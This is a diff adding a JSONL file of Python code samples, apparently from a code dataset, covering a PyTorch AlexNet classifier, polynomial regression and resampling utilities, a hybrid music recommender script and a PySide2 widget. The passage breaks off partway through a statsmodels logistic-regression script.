diff --git "a/5339.jsonl" "b/5339.jsonl" new file mode 100644--- /dev/null +++ "b/5339.jsonl" @@ -0,0 +1,706 @@ +{"seq_id":"103713073","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\n\n\n# Add dropouts when we know what/how to use them...\nclass AlexNet(nn.Module):\n def __init__(self):\n super(AlexNet, self).__init__()\n\n # conv2D layer 3 channels in, 64 channels out, kernel size of 11 and padding of 2\n # initialise all convolution layers in the Alex-Net Architecture\n\n # start with a padding of two to avoid too much downsampling so image doesn't become 0x0\n self.conv1 = nn.Conv2d(3, 64, kernel_size = 11, padding = 2)\n self.conv2 = nn.Conv2d(64, 66, kernel_size = 5, padding = 2)\n self.conv3 = nn.Conv2d(66, 68, kernel_size=3, padding=1)\n self.conv4 = nn.Conv2d(68, 70, kernel_size=3, padding=1)\n self.conv5 = nn.Conv2d(70, 72, kernel_size=3, padding=1)\n\n # fully connected layers (inputs, outputs)\n self.fc1 = nn.Linear(72*7*7, 4096)\n self.fc2 = nn.Linear(4096, 1000)\n # output of 2 characteristics: NORMAL or PNEUMONIA\n self.fc3 = nn.Linear(1000, 2)\n\n # Defining how the Alex-Net is going to run.\n def forward(self, x):\n\n x = self.conv1(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n\n x = self.conv3(x)\n x = F.relu(x)\n\n x = self.conv4(x)\n x = F.relu(x)\n\n x = self.conv5(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n\n # reshape the tensor with 256*7*7 rows\n x = x.view(-1, 72*7*7)\n x = self.fc1(x)\n x = F.relu(x)\n\n x = self.fc2(x)\n x = F.relu(x)\n\n x = self.fc3(x)\n # calculate and return log probabilities for each sample in batch\n output = F.log_softmax(x, dim=1)\n\n return output","sub_path":"models/AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"412317784","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nfrom imageio import imread\nfrom sklearn.linear_model import Ridge, Lasso\nfrom sklearn.model_selection import KFold, train_test_split\nimport sklearn.linear_model as skl\nimport tqdm as tqdm\n\n#For bootstrap\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.utils import resample\n\ndef FrankeFunction(x,y):\n \"\"\"\n Generates Franke's function.\n Input:\n Takes array x and y.\n Output\n Returns array z.\n \"\"\"\n\n term1 = 0.75*np.exp(-(0.25*(9*x-2)**2) - 0.25*((9*y-2)**2))\n term2 = 0.75*np.exp(-((9*x+1)**2)/49.0 - 0.1*(9*y+1))\n term3 = 0.5*np.exp(-(9*x-7)**2/4.0 - 0.25*((9*y-3)**2))\n term4 = -0.2*np.exp(-(9*x-4)**2 - (9*y-7)**2)\n\n return term1 + term2 + term3 + term4\n\ndef generate_data(number_points = 20, plott = True):\n \"\"\"\n Generates data.\n Input:\n plott = True for plotting.\n Output:\n returns 1D arrays x, y and z (after begin raveled).\n \"\"\"\n x_data = np.arange(0, 1, 1./number_points)\n y_data = np.arange(0, 1, 1./number_points)\n\n x, y = np.meshgrid(x_data,y_data)\n\n z = FrankeFunction(x, y)\n if plott == True:\n plotter(x,y,z)\n plt.savefig('plots/Franke/frankefunction.pdf')\n\n #flatten the matrix out\n x = np.ravel(x)\n y = np.ravel(y)\n z = np.ravel(z)\n\n print (\"x ranges from\", 0, \"to\", 1, \"with a total amount of\", number_points, \"points.\")\n print (\"y ranges from\", 0, \"to\", 1, \"with a total amount of\", number_points, \"points.\")\n\n\n eps = np.random.normal(0,1,len(z))\n z += 0.1*eps\n\n return x, y, z\n #print (x_train)\ndef plotter(x,y,z):\n \"\"\"\n Function:\n Generates a three dimensional plot.\n Input:\n Takes an array x, y and z.\n Output:\n Gives a plot.\n \"\"\"\n fig = plt.figure();\n ax = fig.gca(projection='3d');\n # Plot the surface.\n surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False);\n # Customize the z axis.\n ax.set_zlim(-0.10, 1.40);\n ax.zaxis.set_major_locator(LinearLocator(10));\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'));\n for angle in range(0,150):\n ax.view_init(40,angle)\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5);\n\ndef terrain_data(skip_nr_points=50 ,plott = True):\n \"\"\"\n Generates the terrain data.\n Input:\n Skip number of points (lower number to include more data but will be slow)\n plott = True for plotting.\n Output:\n returns 1D arrays x, y and z (after begin raveled).\n \"\"\"\n\n #load the terrain\n terrain1 = imread('datafiles/terraintiff.tif')\n\n #Reducing the size of the terrain data to improve computation time\n z_data = terrain1[::skip_nr_points,::skip_nr_points]\n\n x_data = np.linspace(0,1,len(z_data[0]))\n y_data = np.linspace(0,1,len(z_data[:,0]))\n\n x, y = np.meshgrid(x_data,y_data)\n\n\n z = z_data\n z = (z - np.mean(z))/np.sqrt(np.var(z))\n\n if plott == True:\n\n fig = plt.figure();\n ax = fig.gca(projection='3d');\n # Plot the surface.\n surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False);\n # Customize the z axis.\n #ax.set_zlim(-0.10, 1.40);\n ax.zaxis.set_major_locator(LinearLocator(10));\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'));\n for angle in range(0,150):\n ax.view_init(60,angle)\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5);\n plt.title(\"Terrain Data\")\n plt.savefig(\"plots/Terrain/3D_plot_TERRAIN.pdf\")\n\n fig1 = plt.figure()\n plt.title(\"Terrain over a part of Norway\")\n image = plt.imshow(z_data)\n plt.colorbar(image)\n plt.xlabel('X')\n plt.ylabel('Y')\n plt.savefig(\"plots/Terrain/2D_plot_TERRAIN.pdf\")\n plt.show()\n\n #flatten the matrix out\n x = np.ravel(x)\n y = np.ravel(y)\n z = np.ravel(z_data)\n\n print (\"x ranges from\", 0, \"to\", 1, \"with a total amount of\", len(x), \"points.\")\n print (\"y ranges from\", 0, \"to\", 1, \"with a total amount of\", len(y), \"points.\")\n\n z = (z - np.mean(z))/np.sqrt(np.var(z))\n\n return x, y, z\n\ndef find_designmatrix(x,y, polygrad=5):\n \"\"\"\n Function:\n Generates the designmatrix.\n Input:\n Takes an array x and y and a polynomial degree.\n Output:\n Returns a multidimensional array (designmatrix).\n \"\"\"\n x2 = x*x\n y2 = y*y\n x3 = x*x*x\n y3 = y*y*y\n\n if (polygrad<1):\n raise ValueError (\"error! polygrad is less than 1!!\")\n\n if polygrad == 1:\n X = np.c_[np.ones((len(x),1)),x, y] #3\n elif (polygrad == 2):\n X = np.c_[np.ones((len(x),1)), #0-degree polynomial\n x, y, #1-degree polynomial\n x2,y2,x*y] #2-degree polynomial #6\n elif polygrad == 3:\n X = np.c_[np.ones((len(x),1)), #0-degree polynomial\n x, y, #1-degree polynomial\n x2,y2,x*y, #2-degree polynomial\n x3,y3,x*y2,x2*y] #3-degree polynomial #10\n elif polygrad == 4:\n X = np.c_[np.ones((len(x),1)), #0-degree polynomial\n x, y, #1-degree polynomial\n x2,y2,x*y, #2-degree polynomial\n x3,y3,x*y2,x2*y, #3-degree polynomial\n x*x3,y*y3,x3*y,x*y3,x2*y2] #4-degree polynomial #15\n\n elif polygrad ==5:\n X = np.c_[np.ones((len(x),1)), #0-degree polynomial\n x, y, #1-degree polynomial\n x2,y2,x*y, #2-degree polynomial\n x3,y3,x*y2,x2*y, #3-degree polynomial\n x*x3,y*y3,x3*y,x*y3,x2*y2, #4-degree polynomial\n x3*x2,y3*y2,(x2*x2)*y, x*(y2*y2),x3*y2,x2*y3] #5-degree polynomial #21\n\n #General formula to avoid hardcoding 'too' much.\n elif (polygrad > 5):\n X = np.zeros( (len(x), int(0.5*(polygrad + 2)*(polygrad + 1)) ) )\n poly = 0\n for i in range(int(polygrad) + 1):\n for j in range(int(polygrad) + 1 - i):\n X[:,poly] = np.squeeze((x**i)*(y**j))\n poly += 1\n return X\n\ndef R2(z_data, z_model):\n \"\"\"\n Function:\n Finds the R2-level for a given model and approximation.\n Input:\n Takes an array z_data and z_model.\n Output:\n Returns a scalar.\n \"\"\"\n return (1 - np.sum( (z_data - z_model)**2 ) / np.sum((z_data - np.mean(z_data))**2))\n\ndef MSE(z_data,z_model):\n \"\"\"\n Function:\n Finds the mean square error for a given model and approximation.\n Input:\n Takes an array z_data and z_model.\n Output:\n Returns a scalar.\n \"\"\"\n summ = 0\n for i in range(len(z_data)):\n summ += (z_data[i] - z_model[i])**2\n return summ/(len(z_data))\n\ndef confidence_interval(beta, MSE):\n \"\"\"\n Function:\n Finds the confidence interval.\n We are approximating the variance to be equal the mean square error.\n Input:\n Array beta and scalar MSE.\n Output:\n Array of three indexes with low, mid, and high beta values.\n \"\"\"\n\n sigma = np.sqrt(MSE)\n beta_low = np.mean(beta)-sigma*1.96\n beta_high = np.mean(beta)+sigma*1.96\n return [beta_low, np.mean(beta), beta_high]\ndef SVDinv(A):\n \"\"\"\n Function:\n This function inverts matrixes using singular value dcomposition (SVD).\n\n Input:\n Takes a matrix A.\n\n Output:\n Returns a matrix.\n \"\"\"\n U, s, VT = np.linalg.svd(A)\n\n D = np.zeros((len(U),len(VT)))\n for i in range(0,len(VT)):\n D[i,i]=s[i]\n UT = np.transpose(U); V = np.transpose(VT); invD = np.linalg.inv(D)\n return np.matmul(V,np.matmul(invD,UT))\n\ndef OLS(X,z,inversion='SVD'):\n \"\"\"\n Function:\n This is a solver for the ordinary least square method. Choose 'SVD' for\n numerical stability or choose 'normal' inversion for faster computation.\n\n Input:\n Takes a design matrix as X, a target-vector as z and inversion type.\n\n Output:\n Returns the solution array beta of the ordinary least square method.\n \"\"\"\n if inversion=='normal':\n beta = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(z)\n elif inversion=='SVD':\n A = X.T.dot(X)\n C = SVDinv(A)\n beta = C.dot(X.T).dot(z)\n return beta\n\ndef ridge_regression(X,z,lamb,inversion='SVD'):\n \"\"\"\n Function:\n This is a solver using Ridge regression. Choose SVD for\n numerical stability or choose normal inversion for faster computation.\n\n Input:\n Takes a design matrix as X, a target-vector as z, a hyperparameter\n (constant) lambda and a inversion type.\n\n\n Output:\n Returns the array solution beta of the Ridge regression.\n \"\"\"\n if inversion == 'normal':\n beta = np.linalg.inv(X.T.dot(X) + lamb*np.identity(len(X.T.dot(X)))).dot(X.T).dot(z)\n elif inversion == 'SVD':\n A = (X.T.dot(X) + lamb*np.identity(len(X.T.dot(X))))\n C = SVDinv(A)\n beta = C.dot(X.T).dot(z)\n return beta\n\ndef lasso_regression(X,z,lamb):\n \"\"\"\n Function:\n This is a solver using LASSO regression using the module sklearn.\n\n Input:\n Takes a design matrix as X, a target-vector as z and a hyperparameter\n (constant) lambda.\n\n Output:\n Returns the array solution beta of the LASSO regression.\n \"\"\"\n clf = Lasso(alpha=lamb)\n clf.fit(X,z)\n return (clf.coef_)\n\ndef k_fold_cross_validation(x, y, z, polygrad, k=5, lamb=0, regressiontype = 'OLS', get_CI = False):\n \"\"\"\n Function:\n This is a resample-technique based on the k-fold cross-validation.\n\n Input:\n Takes array input x,y and z as datapoints, the polynomial degree polygrad,\n number of k-fold cross-validation,hyperparameter lamb, a regressiontype,\n and confidence interval of beta.\n\n Output:\n Returns an array of mse and an array of R2-scores for the training data,\n a matrix with beta values for each k-fold, and a vector with mean beta-\n values.\n \"\"\"\n p = int(0.5*(polygrad + 2)*(polygrad + 1))\n train_MSE = np.zeros(k)\n betas = np.zeros((p,k))\n\n kfold = KFold(n_splits = k, shuffle=True)\n\n #splitting our training data into training- and validation data\n i =0\n for train_inds, val_inds in kfold.split(x):\n xtrain = x[train_inds]\n ytrain = y[train_inds]\n ztrain = z[train_inds]\n\n xval = x[val_inds]\n yval = y[val_inds]\n zval = z[val_inds]\n\n Xtrain = find_designmatrix(xtrain,ytrain, polygrad)\n\n if regressiontype == 'OLS':\n betatrain = OLS(Xtrain,ztrain)\n elif regressiontype == 'Ridge':\n betatrain = ridge_regression(Xtrain, ztrain, lamb)\n elif regressiontype == 'Lasso':\n betatrain = lasso_regression(Xtrain, ztrain, lamb)\n else:\n raise ValueError (\"regression-type is lacking input!\")\n\n\n Xval = find_designmatrix(xval,yval,polygrad)\n zpred = Xval @ betatrain\n\n #training data\n z_train = Xtrain @ betatrain\n\n train_MSE[i] = MSE(ztrain,z_train)\n\n # Storing all the betas\n betas[:,i] = betatrain\n\n i += 1\n\n train_MSE = np.mean(train_MSE)\n return [train_MSE], betas\n\ndef bootstrap(x,y,z,degrees,lamb=0,regressiontype='OLS',n_bootstrap=100):\n \"\"\"\n Function:\n This is a resample-technique based on the bootstrap method.\n\n Input:\n Takes array input x,y and z as datapoints, the polynomial degree interval of\n array degrees, a regressiontype and the number of bootstraps.\n\n Output:\n Returns an array of mean square error, the bias, and the variance of the\n test data.\n \"\"\"\n maxdegree = int(degrees[-1])\n\n error_test = np.zeros(maxdegree)\n mse = np.zeros(maxdegree)\n bias = np.zeros(maxdegree)\n variance = np.zeros(maxdegree)\n polydegree = np.zeros(maxdegree)\n\n x_train, x_test, y_train, y_test, z_train, z_test = train_test_split(x,y,z,test_size = 0.2)\n\n for degree in tqdm.tqdm(degrees):\n\n z_ALL_pred = np.empty((z_test.shape[0],n_bootstrap))\n X_test = find_designmatrix(x_test, y_test, polygrad=degree)\n\n\n for i in range(n_bootstrap):\n\n x_,y_,z_ = resample(x_train,y_train,z_train)\n\n Xtrain = find_designmatrix(x_,y_, degree)\n\n if regressiontype == 'OLS':\n betatrain = OLS(Xtrain,z_)\n elif regressiontype == 'Ridge':\n betatrain = ridge_regression(Xtrain, z_, lamb)\n elif regressiontype == 'Lasso':\n betatrain = lasso_regression(Xtrain, z_, lamb)\n else:\n raise ValueError (\"regression-type is lacking input!\")\n\n\n z_ALL_pred[:, i] = (X_test @ betatrain).ravel()\n\n z_test = np.reshape(z_test,(len(z_test),1))\n\n error_test[int(degree)-1] = np.mean( np.mean( ( z_test - z_ALL_pred)**2,axis=1,keepdims=True) )\n bias[int(degree)-1] = np.mean( (z_test - np.mean(z_ALL_pred, axis=1, keepdims=True))**2 )\n variance[int(degree)-1] = np.mean( np.var(z_ALL_pred, axis=1, keepdims=True) )\n return [error_test, bias, variance]\n\ndef bias_variance(x, y, z, polygrad, k, lamb=0, regressiontype = 'OLS'):\n \"\"\"\n Function:\n Finds the bias and variance for some independent test data.\n Input:\n Takes an array x,y, and z, with polynomial degree polygrad, k number of K-fold\n cross validation, hyperparameter lambda and a regression type.\n Output:\n Returns a list with an array of MSE for train data, and an array of MSE,\n an array of bias and an array of variance for test data, an an array of\n confidence intervals for beta values, and the average beta_values for k-fold CV.\n \"\"\"\n x, x_test, y, y_test, z, z_test = train_test_split(x,y,z,test_size=0.2)\n\n scores, beta_k_fold = k_fold_cross_validation(x, y, z, polygrad, k, regressiontype, get_CI = True)\n MSE_train = scores[0]\n\n X_test = find_designmatrix(x_test, y_test, polygrad=polygrad)\n z_pred = X_test @ beta_k_fold\n\n z_test = np.reshape(z_test,(len(z_test),1))\n\n #Calculating different value.\n MSE_test = np.mean( np.mean(( z_test - z_pred)**2,axis=1,keepdims=True) )\n bias_test = np.mean( (z_test - np.mean(z_pred, axis = 1, keepdims=True))**2)\n variance_test = np.mean( np.var(z_pred, axis=1, keepdims=True) )\n R2_test = R2(z_test,np.mean(z_pred,axis=1,keepdims=True))\n\n CI = confidence_interval(np.mean(beta_k_fold,axis=1,keepdims=True), MSE_test)\n\n return [MSE_train,R2_test, MSE_test, bias_test, variance_test, CI], beta_k_fold\n\n\ndef Different_Lambdas(x, y, z, degrees, k, lamb, regressiontype='OLS', resample_method='K_fold_CV'):\n\n \"\"\"\n Function:\n Runs bias_variance function for different polynomial degrees.\n Input:\n Data x,y and z with an array of polynomial degree degrees, number of k-fold\n cross validation, hyperparameter lamb, and a regression type.\n Output:\n Returns an array with mean square errors for the test data.\n \"\"\"\n\n test_MSE = np.zeros(len(degrees))\n test_R2 = np.zeros(len(degrees))\n\n for polygrad in degrees:\n\n j = int(polygrad) - 1\n\n scores, beta_tmp = bias_variance(x, y, z, polygrad, k, lamb, regressiontype)\n\n test_MSE[j] = scores[2]\n\n return test_MSE\n\n\ndef Best_Lambda(x, y, z, degrees, k, lamb, regressiontype='OLS'):\n\n \"\"\"\n Function:\n Runs bias_variance for different polynomial degrees.\n Input:\n Takes arrays of data x,y and z, with array of polynomial degrees, k number of\n k-fold cross validation, a hyperparameter lamb and regressiontype.\n Output:\n Returns arrays of mean square errors for MSE, R2, bias, variance, confidence\n interval for test data. Then returns a dictionary with beta values for different\n polynomial degrees, and finally returns the mean square error for training\n data.\n \"\"\"\n train_MSE = np.zeros(len(degrees))\n test_MSE = np.zeros(len(degrees))\n\n test_R2 = np.zeros(len(degrees))\n bias = np.zeros(len(degrees))\n variance = np.zeros(len(degrees))\n\n CI = np.zeros((len(degrees),3))\n bet = {}\n\n for polygrad in degrees:\n\n j = int(polygrad) - 1\n\n scores, bet[int(polygrad)] = bias_variance(x, y, z, polygrad, k, lamb, regressiontype)\n\n train_MSE[j] = scores[0]\n test_R2[j] = scores[1]\n test_MSE[j] = scores[2]\n bias[j] = scores[3]\n variance[j] = scores[4]\n CI[j] = scores[5]\n\n return test_MSE,test_R2, bias, variance, CI, bet,train_MSE\n","sub_path":"project1/Code/functions/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":16744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"121879767","text":"import pickle\nimport sys\n\nimport time\nfrom scipy import sparse\n\nfrom Dataset.RS_Data_Loader import RS_Data_Loader\nfrom KNN.HybridRecommenderXGBoost import HybridRecommenderXGBoost\nfrom KNN.ItemKNNCFPageRankRecommender import ItemKNNCFPageRankRecommender\nfrom MatrixFactorization.MatrixFactorization_RMSE import IALS_numpy\nfrom SLIM_BPR.Cython.SLIM_BPR_Cython import SLIM_BPR_Cython\nfrom SLIM_ElasticNet.SLIMElasticNetRecommender import SLIMElasticNetRecommender\n\nfrom MatrixFactorization.Cython.MatrixFactorization_Cython import MatrixFactorization_BPR_Cython, \\\n MatrixFactorization_FunkSVD_Cython, MatrixFactorization_AsySVD_Cython\nfrom MatrixFactorization.PureSVD import PureSVDRecommender\n\nfrom Base.NonPersonalizedRecommender import TopPop, Random\n\nimport numpy as np\n\nfrom KNN.UserKNNCFRecommender import UserKNNCFRecommender\nfrom KNN.HybridRecommenderTopNapproach import HybridRecommenderTopNapproach\nfrom KNN.ItemKNNCFRecommender import ItemKNNCFRecommender\nfrom KNN.HybridRecommender import HybridRecommender\nfrom KNN.ItemKNNCBFRecommender import ItemKNNCBFRecommender\nfrom KNN.UserKNNCBFRecommender import UserKNNCBRecommender\nimport Support_functions.get_evaluate_data as ged\nfrom GraphBased.RP3betaRecommender import RP3betaRecommender\nfrom GraphBased.P3alphaRecommender import P3alphaRecommender\nimport xgboost as xgb\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.datasets import make_classification\nimport traceback, os\n\nimport Support_functions.manage_data as md\nfrom run_parameter_search import delete_previous_intermediate_computations\n\n\ndef run():\n evaluate_algorithm = True\n delete_old_computations = False\n slim_after_hybrid = False\n\n # delete_previous_intermediate_computations()\n # if not evaluate_algorithm:\n # delete_previous_intermediate_computations()\n # else:\n # print(\"ATTENTION: old intermediate computations kept, pay attention if running with all_train\")\n # delete_previous_intermediate_computations()\n filename = \"hybrid_ICB_ICF_UCF_IALS_SLIM_ELASTIC_local_081962.csv\"\n\n dataReader = RS_Data_Loader(all_train=not evaluate_algorithm)\n\n URM_train = dataReader.get_URM_train()\n URM_PageRank_train = dataReader.get_page_rank_URM()\n URM_validation = dataReader.get_URM_validation()\n URM_test = dataReader.get_URM_test()\n ICM = dataReader.get_ICM()\n UCM_tfidf = dataReader.get_tfidf_artists()\n # _ = dataReader.get_tfidf_album()\n\n recommender_list1 = [\n # Random,\n # TopPop,\n ItemKNNCBFRecommender,\n # UserKNNCBRecommender,\n ItemKNNCFRecommender,\n UserKNNCFRecommender,\n # P3alphaRecommender,\n # RP3betaRecommender,\n # MatrixFactorization_BPR_Cython,\n # MatrixFactorization_FunkSVD_Cython,\n IALS_numpy,\n SLIM_BPR_Cython,\n # ItemKNNCFRecommenderFAKESLIM,\n # PureSVDRecommender,\n SLIMElasticNetRecommender\n ]\n\n from Base.Evaluation.Evaluator import SequentialEvaluator\n\n evaluator = SequentialEvaluator(URM_test, URM_train, exclude_seen=True)\n\n output_root_path = \"result_experiments/\"\n\n # If directory does not exist, create\n if not os.path.exists(output_root_path):\n os.makedirs(output_root_path)\n\n logFile = open(output_root_path + \"result_all_algorithms.txt\", \"a\")\n\n try:\n recommender_class = HybridRecommender\n print(\"Algorithm: {}\".format(recommender_class))\n\n '''\n Our optimal run\n '''\n recommender_list = recommender_list1 # + recommender_list2 # + recommender_list3\n\n onPop = False\n\n # On pop it used to choose if have dynamic weights for\n recommender = recommender_class(URM_train, ICM, recommender_list, URM_PageRank_train=URM_PageRank_train,\n dynamic=False, UCM_train=UCM_tfidf,\n URM_validation=URM_validation, onPop=onPop)\n\n recommender.fit(**\n {\n \"topK\": [10, 181, 82, -1, 761, 490],\n \"shrink\": [8, 0, 3, -1, -1, -1],\n \"pop\": [280],\n \"weights\": [0.47412263345597117, 1.3864620551711606, 0.6224999770898935, 1.5498327677561246,\n 0.1993692779443738, 2.113324096784624],\n \"final_weights\": [1, 1],\n \"force_compute_sim\": False, # not evaluate_algorithm,\n \"feature_weighting_index\": 0,\n \"epochs\": 150,\n 'lambda_i': [0.0], 'lambda_j': [1.0153577332223556e-08], 'SLIM_lr': [0.1],\n 'alphaP3': [0.4121720883248633],\n 'alphaRP3': [0.8582865731462926],\n 'betaRP': [0.2814208416833668],\n 'l1_ratio': 3.020408163265306e-06,\n 'alpha': 0.0014681984611695231,\n 'tfidf': [True],\n \"weights_to_dweights\": -1,\n \"IALS_num_factors\": 290,\n \"IALS_reg\": 0.001,\n \"IALS_iters\": 6,\n \"IALS_scaling\": 'log',\n \"IALS_alpha\": 40,\n \"filter_top_pop_len\": 0})\n\n print(\"TEST\")\n\n print(\"Starting Evaluations...\")\n # to indicate if plotting for lenght or for pop\n\n results_run, results_run_string, target_recommendations = evaluator.evaluateRecommender(recommender,\n plot_stats=False,\n onPop=onPop)\n\n print(\"Algorithm: {}, results: \\n{}\".format([rec.RECOMMENDER_NAME for rec in recommender.recommender_list],\n results_run_string))\n logFile.write(\"Algorithm: {}, results: \\n{} time: {}\".format(\n [rec.RECOMMENDER_NAME for rec in recommender.recommender_list], results_run_string, time.time()))\n logFile.flush()\n\n if not evaluate_algorithm:\n target_playlist = dataReader.get_target_playlist()\n md.assign_recomendations_to_correct_playlist(target_playlist, target_recommendations)\n md.make_CSV_file(target_playlist, filename)\n print('File {} created!'.format(filename))\n\n\n except Exception as e:\n traceback.print_exc()\n logFile.write(\"Algorithm: {} - Exception: {}\\n\".format(recommender_class, str(e)))\n logFile.flush()\n\n\n#\n# if not evaluate_algorithm:\n# delete_previous_intermediate_computations()\n\nif __name__ == '__main__':\n run()\n","sub_path":"run_all_algorithms_single_interval.py","file_name":"run_all_algorithms_single_interval.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"396513089","text":"from PySide2.QtCore import QObject, Signal\n\nfrom hexrd.ui.hexrd_config import HexrdConfig\nfrom hexrd.ui.ui_loader import UiLoader\n\n\nclass ImageModeWidget(QObject):\n\n # The string indicates which tab was selected\n tab_changed = Signal(str)\n\n # Tell the image canvas to show the snip1d\n polar_show_snip1d = Signal()\n\n def __init__(self, parent=None):\n super(ImageModeWidget, self).__init__(parent)\n\n loader = UiLoader()\n self.ui = loader.load_file('image_mode_widget.ui', parent)\n\n # Always start with raw tab\n self.ui.tab_widget.setCurrentIndex(0)\n\n self.setup_connections()\n self.update_gui_from_config()\n\n def setup_connections(self):\n self.ui.raw_tabbed_view.toggled.connect(HexrdConfig().set_tab_images)\n self.ui.raw_show_saturation.toggled.connect(\n HexrdConfig().set_show_saturation_level)\n self.ui.cartesian_pixel_size.valueChanged.connect(\n HexrdConfig()._set_cartesian_pixel_size)\n self.ui.cartesian_virtual_plane_distance.valueChanged.connect(\n HexrdConfig().set_cartesian_virtual_plane_distance)\n self.ui.cartesian_plane_normal_rotate_x.valueChanged.connect(\n HexrdConfig().set_cartesian_plane_normal_rotate_x)\n self.ui.cartesian_plane_normal_rotate_y.valueChanged.connect(\n HexrdConfig().set_cartesian_plane_normal_rotate_y)\n self.ui.polar_pixel_size_tth.valueChanged.connect(\n HexrdConfig()._set_polar_pixel_size_tth)\n self.ui.polar_pixel_size_eta.valueChanged.connect(\n HexrdConfig()._set_polar_pixel_size_eta)\n self.ui.polar_res_tth_min.valueChanged.connect(\n HexrdConfig().set_polar_res_tth_min)\n self.ui.polar_res_tth_max.valueChanged.connect(\n HexrdConfig().set_polar_res_tth_max)\n self.ui.polar_apply_snip1d.toggled.connect(\n HexrdConfig().set_polar_apply_snip1d)\n self.ui.polar_snip1d_width.valueChanged.connect(\n HexrdConfig().set_polar_snip1d_width)\n self.ui.polar_snip1d_numiter.valueChanged.connect(\n HexrdConfig().set_polar_snip1d_numiter)\n\n self.ui.polar_show_snip1d.clicked.connect(self.polar_show_snip1d.emit)\n\n self.ui.tab_widget.currentChanged.connect(self.currentChanged)\n\n def currentChanged(self, index):\n s = self.ui.tab_widget.tabText(index)\n self.tab_changed.emit(s)\n\n def all_widgets(self):\n widgets = [\n self.ui.raw_tabbed_view,\n self.ui.raw_show_saturation,\n self.ui.cartesian_pixel_size,\n self.ui.cartesian_virtual_plane_distance,\n self.ui.cartesian_plane_normal_rotate_x,\n self.ui.cartesian_plane_normal_rotate_y,\n self.ui.polar_pixel_size_tth,\n self.ui.polar_pixel_size_eta,\n self.ui.polar_res_tth_min,\n self.ui.polar_res_tth_max,\n self.ui.polar_apply_snip1d,\n self.ui.polar_snip1d_width,\n self.ui.polar_snip1d_numiter,\n self.ui.polar_show_snip1d\n ]\n\n return widgets\n\n def block_widgets(self):\n previous = []\n for widget in self.all_widgets():\n previous.append(widget.blockSignals(True))\n\n return previous\n\n def unblock_widgets(self, previous):\n for widget, block in zip(self.all_widgets(), previous):\n widget.blockSignals(block)\n\n def update_gui_from_config(self):\n block_list = self.block_widgets()\n try:\n self.ui.cartesian_pixel_size.setValue(\n HexrdConfig().cartesian_pixel_size)\n self.ui.cartesian_virtual_plane_distance.setValue(\n HexrdConfig().cartesian_virtual_plane_distance)\n self.ui.cartesian_plane_normal_rotate_x.setValue(\n HexrdConfig().cartesian_plane_normal_rotate_x)\n self.ui.cartesian_plane_normal_rotate_y.setValue(\n HexrdConfig().cartesian_plane_normal_rotate_y)\n self.ui.polar_pixel_size_tth.setValue(\n HexrdConfig().polar_pixel_size_tth)\n self.ui.polar_pixel_size_eta.setValue(\n HexrdConfig().polar_pixel_size_eta)\n self.ui.polar_res_tth_min.setValue(\n HexrdConfig().polar_res_tth_min)\n self.ui.polar_res_tth_max.setValue(\n HexrdConfig().polar_res_tth_max)\n self.ui.polar_apply_snip1d.setChecked(\n HexrdConfig().polar_apply_snip1d)\n self.ui.polar_snip1d_width.setValue(\n HexrdConfig().polar_snip1d_width)\n self.ui.polar_snip1d_numiter.setValue(\n HexrdConfig().polar_snip1d_numiter)\n finally:\n self.unblock_widgets(block_list)\n","sub_path":"hexrd/ui/image_mode_widget.py","file_name":"image_mode_widget.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"219625959","text":"\n\n\nimport pandas as pd\nimport numpy as np\nimport random\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\nfrom sklearn.preprocessing import scale\nfrom patsy import dmatrices\n\ndef calculate_vif(X, thresh=10.0):\n dropped = True\n while dropped:\n variables = X.columns\n dropped = False\n # print(X.columns)\n vif = [variance_inflation_factor(X[variables].values, X.columns.get_loc(var)) for var in X.columns]\n # print(vif)\n max_vif = max(vif)\n # print(max(vif))\n if max_vif > thresh:\n maxloc = vif.index(max_vif)\n # print(X.columns.tolist()[maxloc])\n X = X.drop([X.columns.tolist()[maxloc]], axis=1)\n dropped = True\n\n return X\n\n\ndef cem_test(perc, var, combined_papers_scaled, feature_var):\n # remove multi-collinearity\n aftervif = calculate_vif(combined_papers_scaled[feature_var])\n # aftervif = combined_papers_scaled[feature_var]\n\n features = [col.replace(col, 'C({})'.format(col)) if \"publish_\" in col else col for col in aftervif.columns]\n\n formula = \"citation_per_month_binary_{}perc ~ C(covid19) + C(covid19):{} + {}\".format(int(perc*100), var, \"+\".join(features))\n y, x = dmatrices(formula, combined_papers_scaled, return_type=\"dataframe\")\n\n model = sm.Logit(y, x).fit(maxiter=2000, method=\"lbfgs\", retall=False)\n\n write_filename = \"citation_binary_{}perc_{}_cem_model_journal\".format(int(perc*100), var)\n with open(\"../results/updated_results/{}.csv\".format(write_filename), \"w\") as fh:\n fh.write(model.summary().as_csv())\n\n return model\n\nif __name__ == \"__main__\":\n print(\"Loading modeling data...\")\n # COVID19\n covid19_papers_modeling_filename = 